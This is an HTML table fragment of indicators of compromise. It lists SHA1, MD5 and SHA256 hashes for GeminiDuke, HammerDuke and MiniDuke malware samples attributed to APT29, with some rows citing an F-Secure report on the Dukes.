<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3ED561786CA07C8E9862F4F682C1828A039D6DD4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e36d73c6c8e832b7955c442b484472e5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1323e3d7656a427733663f03b3037326ffa9c57c68fa8e014a5bf7cb1455359a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6B0B8AD038C7AE2EFBAD066B8BA22DE859B81F98</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7ad50c9e4a4bab73bba38860906220b6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc54acf4e60688ea668ef40ef965f2bad41dcf260ddae26d28b5551461c4b402</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A3653091334892CF97A55715C7555C8881230BC4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f1583641033d66873ed1604e2f1bea1b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a8b01a219a9fe565aadf82bc28b60048c60b640e780386c7a84a425049df5af9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B14B9241197C667F00F86D096D71C47D6FA9ACA6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6d45f34e6d29391ee6f0e91bf344a7d0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ce2c4dd21b99407bfa7066a6a57d180c00527e7db8ee52558c597550ac8b5d7c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Geminiduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C011552D61AC5A87D95E43B90F2BF13077856DEF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6f5a73931c6c109bd6504a5ee0476ae7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7b9e542426408aa384d0394820f82f330e615a1ad17a777d04720458b33b08a3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">HammerDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">HammerDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42E6DA9A08802B5CE5D1F754D4567665637B47BC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d3109c83e07dd5d7fe032dc80c581d08</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8995535721ebeaf6983c6cecf3182d756ca5b3911607452dd4ba2ad8ec86cf96</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">00852745CB40730DC333124549A768B471DFF4BC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cf59ed2b5473281cc2e083eba3f4b662</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d0b1f970eaeeabf9372ffc1ad7e61226632904cf0311ea8f872ddbfd34a3a2a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">03661A5E2352A797233C23883B25BB652F03F205</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f13dc03904dbd45374acc2134477273</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6e57c69963562d28a3a9da9f9103c199c909d0baa185a5d21e1b200a5a14ab72</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">045867051A6052D1D910ABFCB24A7674BCC046CA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ff83dad77ac2b526849930f1860dfd3f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e961202d84aad7fa9faaeb63651735416612d25c611a7a025e2eaab67c79e272</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0D78D1690D2DB2EE322CA11B82D79C758A901EBC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c786a4cdfe08dbe7c64972a14669c4d1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">abfffd23c81b6301675567622ccee08cf578ce91f372fce68cff8fc1dbc3053d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E263D80C46D5A538115F71E077A6175168ABC5C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78e51be60eab2c6e952c9538a46ab521</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">05e4224d4dd4e5fbd381ed33edb5bf847fbc138fbe9f57cb7d1f8fc9fa9a382d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">103C37F6276059A5FF47117B7F638013CCFFE407</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">74593127f50abff5327b3f7038b456d2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55129d34050b2c028de564e3166611e1d148c26de0972cbe047caf530f118468</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">118114446847EAD7A2FE87ECB4943FDBDD2BBD1E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4c6608203e751cf27f627220269d6835</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">29ad305cba186c07cedc1f633c09b9b0171289301e1d4319a1d76d0513a6ac50</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">15C75472F160F082F6905D57A98DE94C026E2C56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">738c60fff066934b6f33e368cfe9a88c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">de8184c6850d17f90e861309828af1f7b7e3b1695ebe5d303d3d4b6ef4ba1218</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1BA5BCD62ABCBFF517A4ADB2609F721DD7F609DF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">48bbce47e4d2d51811ea99d5a771cd1a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1f19bd932336fa721e739b32c07b67c01ea4bd0ebc70e92a70f41e51f4668a0a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E6B9414FCE4277207AAB2AA12E4F0842A23F9C1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4ad6b55b1bc9e16123de1388f6ef9bf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7889fbd40f65cfe21d0c7486b29eb4c5042abff4ac660c12c7936831445cfd6e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">223C7EB7B9DDE08EE028BBA6552409EE144DB54A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a67ad3e2a020f690d892b727102a759b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">35c08566dc38ad65e906b3683ace98e5beef855aeedc611a0317a72eee193539</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">28A43EAC3BE1B96C68A1E7463AE91367434A2AC4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">297ef5bf99b5e4fd413f3755ba6aad79</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c60621e82f58b5ea5b36cde40889a076cb2c7f1612144998b1d388200bc7e295</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">296FD4C5B4BF8EA288F45B4801512D7DEC7C497B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8e89f9908262b5385623c0e39d6b940</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8e28dcf7fd7ce1ad9a65c186e09a7843ee31af924509148f085958cadfdda8fb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2A13AE3806DE8E2C7ADBA6465C4B2A7BB347F0F5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">561017f887865b8d13f85c5474cdcbb8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dfe146fffd2ae59172f52048f7e7d231807e0d732e19bdb443820a8305165741</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2CEAE0F5F3EFE366EBDED0A413E5EA264FBF2A33</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">441ee6a307e672c24d334d66cd7b2e1a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f4b01a3a299b09d2b4418cb66e80c34e3ec04016ed27199c472515cf95a023d0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2D74A4EFAECD0D23AFCAD02118E00C08E17996ED</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73931351f883cff5dbdcc54cc4eb10a7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">15101f74f974e3e80cc37805ebe5cc2efed77bb5745d82e1b44b1da4f0c83691</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30B377E7DC2418607D8CF5D01AE1F925EAB2F037</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2dcd049c591644e35102921a48799975</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">354786c5df71cd090c96d1328b4e31cd28b8ddc77904863d100b6c35ad235b69</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">31AB6830F4E39C2C520AE55D4C4BFFE0B347C947</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ffefe16d581340c1e49f585a576a1fd8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">764f8c8f8832954c99fb0c2ac5ac5d89506dc5dc50310c9112318b75e9f9e2bf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">36B969C1B3C46953077E4AABB75BE8CC6AA6A327</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ab2d8a0d5b03d40f148f2f907b55f9f1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55265193d63d56553e8e135e9a60d7d7c13cbf9d82ac25f84306ec98d74725b0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">416D1035168B99CC8BA7227D4C7C3C6BC1CE169A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">811f66d6dd2c713073c0b0aebbe74ce8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4809c2c7fa19acfa011f97946205f979afb54ac2c166f48ab35a20cd9d53a2ca</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43FA0D5A30B4CD72BB7E156C00C1611BB4F4BD0A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b100d530d67cfbe76394bb0160567382</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9c13a32033bc7dd06016651b0f21a2bed9be1dc40c6879f925c71e05f4f1c8f7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">493D0660C9CF738BE08209BFD56351D4CF075877</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">86ef8f5f62ae8590d6edf45e04806515</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a6e2852f2e6701656da74adb412cd0850b0d27750803613223be3eb5ac5cc26c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4B4841CA3F05879CA0DAB0659B07FC93A780F9F1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d3542af992b1de4cf1f587f61dddb50</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f151f5a656d43a76a07fa03166906d51f9683b27b0e9b86464e3a68e9dba1fac</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4EC769C15A9E318D41FD4A1997EC13C029976FC2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">05d10323111f02233163a6742556c974</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">62a2df9d001d3e0f222d77b6781eb279761f1354570773ef1929a86557a11454</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">53140342B8FE2DD7661FCE0D0E88D909F55099DB</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e990e0d1ee90cd10c4be7bfde6cc3e5a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cc6ad212f50e0a7a708bb1b63a01d8932f471618cdda69b2e12106ae112b2415</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5ACAEA49540635670036DC626503431B5A783B56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c519eef57001ad3ae60cdcb0009bf778</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acd886fa7b9117807f1e11f0f38b9fad1afce51aa9cfbe3810a39d883d0ca663</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5B2C4DA743798BDE4158848A8A44094703E842CB</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e863737773f64498091cd775c7abde66</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ecc5e2526ca32a447c862612b71c1db5675a759897e680573fa143ac0a8e662a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">634A1649995309B9C7D163AF627F7E39F42D5968</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8088f6594dd8cba31b4f52a2d91f40e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5569b85532adb1e637f83c997910924345f10aa9c2948b3d26be13eec6cbeb8b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">683104D28BD5C52C53D2E6C710A7BD19676C28B8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e1a659473ae1e828508309b77da13783</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">830ee990a6d4aaf00bb051704c93b468792561e8dd6a6ed4662f6032d38dd37a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">694FA03160D50865DCE0C35227DC97FFA1ACFA48</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6942f1dfd61d231df8acb7ed0f6310c4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f0d822926f4e6aec2cf2bd7701d67e8399ccc05bc028377a275a90e06620a109</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73366C1EB26B92886531586728BE4975D56F7CA5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c92252487615d5379317febc22dba7d4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f5d3a8dfa13ba8e2142a3b1d644f107cc89c7e90cda2a5543df5787f8bfde1e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">827DE388E0FEABD92FE7BD433138AA35142BD01A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ab25d33d61cf4cfbac92c26c7c0598e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6a95d2895362fc8657bc90d73d77e32f09b86699eb625905ddeb45ccd6b13c71</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">909D369C42125E84E0650F7E1183ABE740486F58</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">423bb8914078a587d08b54d16bbd527c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c13794601c5bdec3d5d76de9571e6c0e0b022b9fc62907018566895e3b949982</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9796D22994FF4B4E838079D2E5613E7AC425DD1D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ded2f80457aaefe1a80a9cefd1f4645d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bf210e54c65ea69ebda418f701c2c6b8aff840f31c1072d641a726cef8c7b5ad</span></td></tr>
